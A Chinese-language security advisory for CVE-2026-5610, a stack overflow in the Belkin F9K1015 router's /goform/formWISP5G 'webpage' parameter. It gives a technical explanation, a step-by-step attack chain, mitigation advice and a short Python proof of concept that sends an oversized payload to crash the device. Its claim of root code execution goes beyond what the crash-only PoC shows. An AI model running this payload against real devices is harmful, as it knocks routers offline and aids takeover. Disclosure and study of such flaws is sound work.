CVE-2026-5610 Belkin F9K1015栈溢出漏洞

漏洞信息

漏洞编号

CVE-2026-5610

漏洞类型

栈溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Belkin F9K1015

漏洞概述

Belkin F9K1015路由器固件版本1.00.10中存在严重的栈溢出漏洞。该漏洞位于/goform/formWISP5G接口的处理函数formWISP5G中，由于对参数webpage缺乏严格的边界检查，攻击者可通过发送特制的数据包触发栈溢出。由于CVSS评分高达8.8，攻击者无需用户交互且仅需低权限即可发起远程攻击。该漏洞可能导致设备崩溃（拒绝服务）或潜在的任意代码执行，从而完全控制设备。目前厂商尚未对此漏洞做出响应，且利用代码已公开，风险极高。

技术细节

该漏洞的根本原因在于Belkin F9K1015设备固件版本1.00.10中，处理WISP（无线互联网服务提供商）配置功能的CGI程序存在安全缺陷。具体来说，当Web服务器接收到发送至`/goform/formWISP5G`的HTTP POST或GET请求时，会将请求参数传递给后台的`formWISP5G`函数进行处理。在该函数中，代码直接使用了不安全的内存拷贝函数（如`strcpy`或`sprintf`）来处理用户提交的`webpage`参数，而未预先验证该参数的长度是否超过了目标缓冲区的大小。由于缓冲区位于栈上，当传入超长字符串时，多余的数据将覆盖栈上的返回地址或其他关键寄存器值。攻击者可以通过精心构造恶意的`webpage`参数内容，覆盖返回地址指向特定的Shellcode或ROP（面向返回编程）链。由于漏洞利用无需用户交互（UI:N）且攻击复杂度低（AC:L），远程攻击者可以在获得低权限账户（PR:L）后，利用此漏洞提升权限并执行任意代码，进而完全接管设备的控制权，导致机密性、完整性和可用性全面受损。

攻击链分析

STEP 1

侦察

攻击者识别网络中的Belkin F9K1015设备，并确认其固件版本为1.00.10。

STEP 2

获取低权限访问

攻击者获取设备的低权限账户凭据（PR:L），可能通过弱口令猜测或默认凭证。

STEP 3

发送恶意载荷

攻击者向/goform/formWISP5G端点发送特制的HTTP POST请求，其中包含超长的webpage参数数据。

STEP 4

触发溢出

服务器处理请求时，webpage参数覆盖了栈上的返回地址，导致控制流被劫持。

STEP 5

执行代码

设备跳转到攻击者控制的Shellcode或ROP链，以Root权限执行任意代码，完全控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_ip):
    """
    Proof of Concept for CVE-2026-5610
    Sends a large payload to the 'webpage' parameter to trigger stack overflow.
    """
    url = f"http://{target_ip}/goform/formWISP5G"
    # Payload designed to overflow the stack buffer
    # Adjust length based on specific buffer size analysis
    overflow_payload = "A" * 1000 
    
    data = {
        "webpage": overflow_payload
    }
    
    try:
        print(f"[+] Sending payload to {url}...")
        response = requests.post(url, data=data, timeout=5)
        
        # If the device crashes, we might not get a response or get an error
        print(f"[+] Status Code: {response.status_code}")
        print("[+] Payload sent. Check if the device has crashed or rebooted.")
        
    except requests.exceptions.RequestException as e:
        print(f"[!] Device likely crashed or unreachable: {e}")

if __name__ == "__main__":
    target = "192.168.2.1" # Replace with target IP
    check_vulnerability(target)

影响范围

Belkin F9K1015 1.00.10

防御指南

临时缓解措施

由于厂商尚未发布补丁，建议用户暂时禁用WISP功能或封闭路由器管理端口（通常为80/443）的外网访问。若非必须使用，应将设备放置在隔离网络环境中，避免连接到不可信网络，并定期检查设备运行状态，及时发现异常重启或性能下降情况。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5610
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5610
3 Details https://www.cvedetails.com/cve/CVE-2026-5610/
4 VulDB https://vuldb.com/cve/CVE-2026-5610
5 Link https://github.com/Litengzheng/vuldb_new/blob/main/Belkin%20F9K1015/vul_3/README.md
6 Link https://vuldb.com/submit/785537
7 Link https://vuldb.com/vuln/355401
8 Link https://vuldb.com/vuln/355401/cti